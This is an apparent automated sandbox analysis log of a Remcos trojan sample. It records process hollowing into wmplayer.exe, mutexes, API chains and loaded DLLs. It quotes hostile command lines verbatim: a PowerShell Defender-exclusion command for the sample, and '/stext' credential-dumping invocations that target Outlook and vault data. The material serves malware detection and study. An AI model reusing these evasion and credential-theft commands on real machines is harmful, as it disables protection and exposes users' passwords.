                    Source: Process Memory Space: wmplayer.exe PID: 7172, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: IB9876789000.bat.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9994467338217338
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@21/15@1/2
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,13_2_004182CE
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6_2_00416AB7
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 15_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,15_2_00410DE1
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,13_2_00418758
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,6_2_0040E219
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,6_2_0041A63F
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,6_2_00419BC4
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].jsonJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-MKYDDH
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:384:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1220
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vw4nikdb.iie.ps1Jump to behavior
                    Source: IB9876789000.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: IB9876789000.bat.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSystem information queried: HandleInformationJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: wmplayer.exe, wmplayer.exe, 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: wmplayer.exe, wmplayer.exe, 0000000E.00000002.2193872927.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: wmplayer.exe, 00000006.00000002.4570535787.00000000056B0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: wmplayer.exe, wmplayer.exe, 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: wmplayer.exe, wmplayer.exe, 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: wmplayer.exe, wmplayer.exe, 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: wmplayer.exe, 0000000D.00000002.2211542921.0000000005300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: wmplayer.exe, wmplayer.exe, 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: IB9876789000.bat.exeReversingLabs: Detection: 42%
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeFile read: C:\Users\user\Desktop\IB9876789000.bat.exeJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                    Source: unknownProcess created: C:\Users\user\Desktop\IB9876789000.bat.exe "C:\Users\user\Desktop\IB9876789000.bat.exe"
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1220 -s 1600
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\jzszgephmrwnuwaygkssej"
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\jzszgephmrwnuwaygkssej"
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\luyrhxabazosxcocxvflpvzau"
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\wwdciplcohgxhqkohgsnsamrdphe"
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IB9876789000.bat.exe" -ForceJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"Jump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\jzszgephmrwnuwaygkssej"Jump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\jzszgephmrwnuwaygkssej"Jump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\luyrhxabazosxcocxvflpvzau"Jump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /stext "C:\Users\user\AppData\Local\Temp\wwdciplcohgxhqkohgsnsamrdphe"Jump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: version.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: pstorec.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: pstorec.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: IB9876789000.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: IB9876789000.bat.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdbRSDS source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.pdbH source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.pdb0 source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Management.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Management.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Management.pdbH source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdbh source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdb source: WERBAFE.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WERBAFE.tmp.dmp.10.dr
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,6_2_0041BCE3
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeCode function: 0_2_00007FF848B6D5F1 push es; ret 0_2_00007FF848B6D60A
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeCode function: 0_2_00007FF848B67563 push ebx; iretd 0_2_00007FF848B6756A
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeCode function: 0_2_00007FF848B6E478 push cs; ret 0_2_00007FF848B6E47A
                    Source: C:\Users\user\Desktop\IB9876789000.bat.exeCode function: 0_2_00007FF848C4026B push esp; retf 4810h0_2_00007FF848C40312
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_004567E0 push eax; ret 6_2_004567FE
                    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0045B9DD push esi; ret 6_2_0045B9E6
